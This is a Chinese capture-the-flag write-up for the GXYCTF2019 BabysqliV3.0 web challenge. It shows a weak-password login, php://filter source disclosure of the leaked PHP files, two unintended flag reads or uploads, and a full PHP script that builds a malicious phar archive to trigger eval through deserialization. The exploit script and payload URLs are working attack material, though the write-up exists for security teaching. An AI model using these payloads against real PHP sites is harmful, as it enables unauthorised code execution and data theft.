• [GXYCTF2019]BabysqliV3.0题解


    [GXYCTF2019]BabysqliV3.0

    常规分析

    题目叫babysqli,刚访问的时候会有一个登录页面,于是我用测了测sql注入,毫无收获。

    最后发现是弱口令,账号admin,密码password。

    登录进去以后是这样的:

    Untitled

    url末尾是file=的形式,怀疑是文件包含,并且自动在xxx后面加.php。

    将file=后面的参数改为php://filter/read=convert.base64-encode/resource=home,解码后得到home.php的内容。

    <?php
    session_start();
    echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
    error_reporting(0);
    if(isset($_SESSION['user'])){
    	if(isset($_GET['file'])){
    		if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
    			die("hacker!");
    		}
    		else{
    			if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
    				$file = $_GET['file'].".php";
    			}
    			else{
    				$file = $_GET['file'].".fxxkyou!";
    			}
    			echo "当前引用的是 ".$file;
    			require $file;
    		}
    		
    	}
    	else{
    		die("no permission!");
    	}
    }
    ?>
    

    同理可得到upload.php的内容。

    <?php
    error_reporting(0);
    class Uploader{
    	public $Filename;
    	public $cmd;
    	public $token;
    	
    
    	function __construct(){
    		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
    		$ext = ".txt";
    		@mkdir($sandbox, 0777, true);
    		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
    			$this->Filename = $_GET['name'];
    		}
    		else{
    			$this->Filename = $sandbox.$_SESSION['user'].$ext;
    		}
    
    		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
    		$this->token = $_SESSION['user'];
    	}
    
    	function upload($file){
    		global $sandbox;
    		global $ext;
    
    		if(preg_match("[^a-z0-9]", $this->Filename)){
    			$this->cmd = "die('illegal filename!');";
    		}
    		else{
    			if($file['size'] > 1024){
    				$this->cmd = "die('you are too big (′▽`〃)');";
    			}
    			else{
    				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
    			}
    		}
    	}
    
    	function __toString(){
    		global $sandbox;
    		global $ext;
    		// return $sandbox.$this->Filename.$ext;
    		return $this->Filename;
    	}
    
    	function __destruct(){
    		if($this->token != $_SESSION['user']){
    			$this->cmd = "die('check token falied!');";
    		}
            //cmd可以被执行 但是需要token
    		eval($this->cmd);
    	}
    }
    
    if(isset($_FILES['file'])) {
    	$uploader = new Uploader();
    	$uploader->upload($_FILES["file"]);
    	if(@file_get_contents($uploader)){
    		echo "下面是你上传的文件:<br>".$uploader."<br>";
    		echo file_get_contents($uploader);
    	}
    }
    ?>
    

    代码中给了一个class,怀疑可能是一道反序列化的题目,没有反序列化函数但是又涉及到文件上传,基本可以确定是一道phar反序列化题目。

    反序列化题目一般可用的点主要是各个魔术方法,本题目中两个魔术方法有可能被利用。

    function __toString(){
    	global $sandbox;
    	global $ext;
    	// return $sandbox.$this->Filename.$ext;
    	return $this->Filename;
    }
    
    function __destruct(){
    	if($this->token != $_SESSION['user']){
    		$this->cmd = "die('check token falied!');";
    	}
          //cmd可以被执行 但是需要token
    	eval($this->cmd);
    }
    

    可以很明显的看到__destruct魔术方法中存在eval,有机会被利用。当然,__toString魔术方法也有机会。

    非预期1

    __toString魔术方法被调用了,该方法返回一个文件名,如果存在读取文件的操作,也可能被利用。刚好file_get_contents方法触发了该方法,因此可以通过将Filename参数改为flag的路径来读取flag信息。

    if(isset($_FILES['file'])) {
    	$uploader = new Uploader();
    	$uploader->upload($_FILES["file"]);
    	if(@file_get_contents($uploader)){
    		echo "下面是你上传的文件:<br>".$uploader."<br>";
    		echo file_get_contents($uploader);
    	}
    }
    

    恰好在Uploader类中存在一个可以直接控制Filename的方法:

    if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
    			$this->Filename = $_GET['name'];
    }
    

    用户可以自己传一个name参数作为Filename,并且过滤也并没有限制读取flag。

    接下来的过程就比较简单了,访问/home.php?file=upload&name=/var/www/html/flag.php,然后随便上传一个符合要求的文件,即可得到flag。

    Untitled

    非预期2

    这个题,上传的时候并没有过滤PHP,还可以指定上传的文件名。所以,直接上传个PHP文件,即可执行命令。本文传了一个写有phpinfo的文件进行测试,上传的文件为a.php。

    上传的时候url为home.php?file=upload&name=a.php。

    上传后访问根目录下的a.php即可。

    Untitled

    预期解

    预期解应该是对cmd参数的利用,加下来说一下预期解应该怎么做。

    cmd的利用在destruct魔术方法中,要想利用cmd必须绕过对token的比较。

    if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
    			$this->Filename = $_GET['name'];
    		}
    		else{
    			$this->Filename = $sandbox.$_SESSION['user'].$ext;
    		}
    
    		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
    		$this->token = $_SESSION['user'];
    

    根据上述代码可知,token来自于\(_SESSION['user']中,而如果用户不自己传递name的值,则Filename的值中会包含\)_SESSION['user']。因此我们可以先随便上传一个文件,不传递name参数,这样就可以拿到$_SESSION['user']。

    Untitled

    前面提到,这看起来是一个标准的phar反序列化题目,可以上传文件,没有限制phar协议读取文件,并且有一个可以被利用的类。接下来就是控制class中各个参数的值,生成一个phar文件并访问,触发命令执行,从而得到flag。

    exp

    <?php
    error_reporting(0);
    class Uploader{
    	public $Filename = 'aaa';
    	//可以先用phpinfo等函数测试一下
    	public $cmd = 'echo file_get_contents("/var/www/html/flag.php");';
    	public $token = 'GXY88cc1f1606f74121a99dd1de5560b585';
    
    }
    @unlink("phar.phar");
    $phar = new Phar("phar.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new Uploader();
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
    ?>
    

    将生成的phar文件上传,利用phar协议访问url即可。

    下图分别是用phpinfo测试的结果和最终得到flag的结果。

    Untitled

    Untitled

  • 相关阅读:
    计算机方向的一些顶级会议和期刊—Top Conferences and Journals in Computer Science
    jvm dns缓存问题解决方式
    eclipse调试过程中插入代码执行
    Spring Atomikos分布式事务
    spring quartz 注解配置定时任务
    web系统性能分析JavaMelody
    收集到几种开源NLP工具
    记录些实用的linux指令串
    javamelody对Java Application进行监控
    解决ssh连接问题1
  • 原文地址:https://www.cnblogs.com/kevinbruce656/p/15545986.html
Copyright © 2020-2023  润新知